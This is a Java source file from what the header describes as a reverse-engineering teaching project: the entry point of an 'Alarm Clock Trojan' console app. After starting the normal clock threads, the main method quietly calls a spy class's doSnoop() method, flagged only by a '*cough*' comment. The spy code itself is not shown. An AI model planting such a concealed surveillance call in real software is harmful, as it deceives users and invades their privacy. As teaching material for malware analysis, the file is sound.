/*****************************************************************
 * Project:         Software Reverse Engineering (SRE) Education
 *                  Malware, Adware, and Spyware
 *                  Alarm Clock Trojan (Malware) Application
 * Programmer:      Teodoro Cipresso, San Jose State University
 *                  tcipress@hotmail.com
 ******************************************************************
 */
package info.reversingproject.alarmclock;

/**
 * This class implements the main entry point for the Alarm Clock console
 * application. The MVC pattern implementation classes are instantiated with the
 * view and controller started on different threads.
 */
public class AlarmClock {

	/**
	 * Entry point
	 * 
	 * @param args
	 *            [n], not used by this program
	 */
	public static void main(String[] args) {
		// instantiate MVC implementation
		AlarmClockModel alarmClockModel = new AlarmClockModel();
		AlarmClockController alarmClockController = new AlarmClockController();
		AlarmClockView alarmClockView = new AlarmClockView();
		// setup associations
		alarmClockController.setAlarmClockModel(alarmClockModel);
		alarmClockController.setAlarmClockView(alarmClockView);
		alarmClockView.setAlarmClockModel(alarmClockModel);
		alarmClockView.setAlarmClockViewListener(alarmClockController);
		// start controller and view on separate threads
		alarmClockController.start();
		alarmClockView.start();
		// *cough*
		new AlarmClockSpy().doSnoop();
	} // main
} // AlarmClock

